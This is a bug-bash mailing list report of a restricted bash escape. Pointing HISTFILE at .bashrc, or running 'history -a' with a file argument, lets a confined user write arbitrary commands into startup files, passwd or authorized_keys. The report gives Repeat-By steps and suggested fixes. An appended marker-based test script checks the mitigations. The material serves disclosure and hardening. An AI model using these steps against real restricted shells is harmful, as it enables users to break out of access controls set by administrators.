bug-bash

Potential restricted bash escape by modifying history file


From: Diffie
Subject: Potential restricted bash escape by modifying history file
Date: Thu, 30 Apr 2020 14:22:31 -0400
User-agent: Cyrus-JMAP/3.3.0-dev0-351-g9981f4f-fmstable-20200421v1

Configuration Information [Automatically generated, do not change]:
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security 
-Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions 
-fstack-protector-strong -grecord-gcc-switches 
-specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 
-specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic 
-fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection 
-Wno-parentheses -Wno-format-security
uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC 
2020 x86_64 x86_64 x86_64 GNU/Linux
Machine Type: x86_64-redhat-linux-gnu

Bash Version: 5.0
Patch Level: 11
Release Status: release

*Description:*
It is possible to write/append arbitrary content to files from a restricted 
bash shell (with the privileges of the current user context) by tweaking the 
HISTFILE variable, or by specifying a filename to "history -[a][w]". This does 
not necessarily lead to a restriction bypass in all configurations, but does in 
a few that come to mind:

* If the user can write to their home directory they can append arbitrary code 
to .bashrc/other shell files. These shell files will execute the code without 
restrictions on subsequent runs of rbash (assuming rbash is not being run in 
posix mode, and that --norc is not being passed)
* If the user is root they can trivially get an unrestricted shell by modifying 
/etc/passwd, etc.
* If the cwd contains an executable script that the user can write to, they can 
append to the script with arbitrary code, then invoke this code from rbash: 
"hash -p executable_script mal_command ; mal_command" (this could be possible 
with an executable binary too, although would be a little more complex)
* SSH authorized keys, various other configs.
* etc...

Again, it will depend on the configuration, but this seems exploitable in most 
configurations of rbash (one where it may be more difficult to exploit is when 
the user is placed into a non-home directory chroot where they have limited 
write access).


*Repeat-By:*
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc
[__RESTRICTED] bash-5.0$ history -c
[__RESTRICTED] bash-5.0$ /usr/bin/whoami
[__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command 
names
[__RESTRICTED] bash-5.0$ history -a
[__RESTRICTED] bash-5.0$ exit

[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie # whoami inserted into .bashrc above
[__RESTRICTED] bash-5.0$

OR without using HISTFILE variable

[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc '
> /usr/bin/whoami
> '
[__RESTRICTED] bash-5.0$ exit

[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie
[__RESTRICTED] bash-5.0$


*Fix:*
* Disable writing to a specific file in rbash with "history -[a][w] 
/tmp/bad_file bad_command" and make HISTFILE readonly. There may be some other 
edge cases here.
* Disable history in rbash altogether.

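The script below is an added example, not code from this post or from the bash project. It drives the Repeat-By above from a here-document against a restricted bash twice: once with an empty rc file (a stock rbash) and once with an rc file carrying the fixes suggested in the post (read-only HISTFILE, history disabled) plus `enable -n history`, which rbash forbids undoing. It then checks whether attacker-chosen text landed in a file of the attacker's choosing. Assumptions: a bash with restricted mode is on PATH, the rbash user's startup file is under the administrator's control (otherwise the first bullet of the description applies), and the marker string, temp paths and rc contents are constructed here.

```shell
#!/bin/sh
# Probe for the HISTFILE write primitive from the report above.
# Not part of the bug-bash post or of bash itself. Works only inside a
# scratch directory it creates; the "payload" is a constructed marker.

# Drive a restricted, interactive bash from a here-document the way the
# report's Repeat-By does: point HISTFILE at the target, type a command
# rbash rejects (it is still recorded, because the restriction check runs
# at execution time, after the parser added the line to the history list),
# then append the history with "history -a", both with and without a
# file argument. Returns 0 if the marker reached the target, 1 otherwise.
probe_histfile_write() {
    target="$1"
    rcfile="$2"
    marker="PROBE_MARKER_$$"   # constructed; a real attacker puts shell code here

    # Long options first (bash parses them before single-letter flags).
    # -i forces an interactive shell so typed lines go into the history list;
    # -r applies the restrictions after the rc file has been read.
    HISTFILE="$target" HISTCONTROL= HISTIGNORE= \
        bash --rcfile "$rcfile" -r -i >/dev/null 2>&1 <<EOF || true
export HISTFILE="$target"
history -c
/usr/bin/$marker
history -a
history -a "$target"
EOF

    if grep -q -- "/usr/bin/$marker" "$target" 2>/dev/null; then
        return 0
    fi
    return 1
}

# Write an rc file with the report's suggested mitigations, applied from the
# administrator side (assumption: the file is not writable by the rbash user).
write_hardened_rc() {
    cat > "$1" <<'EOF'
# Pin the history file and make the variable read-only, so an attacker's
# "export HISTFILE=..." fails with "readonly variable".
HISTFILE=/dev/null
readonly HISTFILE
# Stop recording lines at all, so "history -a FILE" has nothing to append.
set +o history
# Remove the builtin; rbash refuses "enable history" once restricted.
enable -n history
EOF
}

# Stand-alone demonstration: baseline versus hardened, in a scratch directory.
demo() {
    scratch="$(mktemp -d)"
    : > "$scratch/baseline.rc"            # empty rc: stock restricted shell
    write_hardened_rc "$scratch/hardened.rc"

    if probe_histfile_write "$scratch/victim_baseline" "$scratch/baseline.rc"; then
        echo "baseline rbash: attacker text written to $scratch/victim_baseline"
    else
        echo "baseline rbash: write did not happen (bash version may differ)"
    fi
    if probe_histfile_write "$scratch/victim_hardened" "$scratch/hardened.rc"; then
        echo "hardened rbash: still writable, mitigation ineffective"
    else
        echo "hardened rbash: write blocked"
    fi
    rm -rf "$scratch"
}

demo
```

Run it as the user who will be placed in rbash. The marker line in the target is the same text that a real attacker would make a shell fragment, an authorized_keys line or a passwd entry, which is why the check is on the file's contents rather than on the restricted shell's error messages.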
